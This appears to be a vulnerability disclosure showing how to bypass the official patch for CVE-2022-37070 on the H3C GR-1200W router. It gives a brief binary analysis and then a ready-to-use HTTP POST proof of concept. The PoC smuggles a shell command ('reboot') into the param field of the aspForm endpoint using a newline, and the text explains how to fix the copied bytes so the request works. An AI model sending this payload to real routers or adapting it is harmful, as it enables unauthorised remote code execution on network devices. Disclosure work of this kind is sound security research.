This is a method to bypass the offical patch for CVE-2022-37070

Vulnerability introduction

H3C GR-1200W was discovered a fatal vulnerabilities that can cause a remote code execution(RCE) via the aspForm parame

Official website : https://www.h3c.com/

Download link: H3C MiniGRW1A0V100R008 版本软件及说明书-新华三集团-H3C

H3C MiniGRW1A0V100R008 is the latest version on GR-1200W

Vulnerability analysis

DelL2tpLNSList parameter in the function sub_46F0A8

In the binary file /bin/webs , we use IDA to locate the function sub_46F0A8 that causes the vulnerability.

As you can see, the snprintf function is called on line 36 of the sub_46F0A8 function. Let’s trace the source of the parameter

We found that the value of v14 and v15 is determined by parameter , we can bypass the check_function sub_46F3F0(CVE-2022-37070 offical patch) by using the character ‘0a’ like this

The image shows the router rebooting after the reboot command is executed

The POC is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /goform/aspForm HTTP/1.1
Host: 
Cookie: JSESSIONID=4b159886
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://114.241.54.34:8989
Referer: https://114.241.54.34:8989/vpn_l2tp_lac.asp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Connection: close

CMD=DelL2tpLNSList&param=1; 
reboot;

Note that when copying this POC, there will be an additional 0d byte after ‘param=1;’, and all you need to do is delete this byte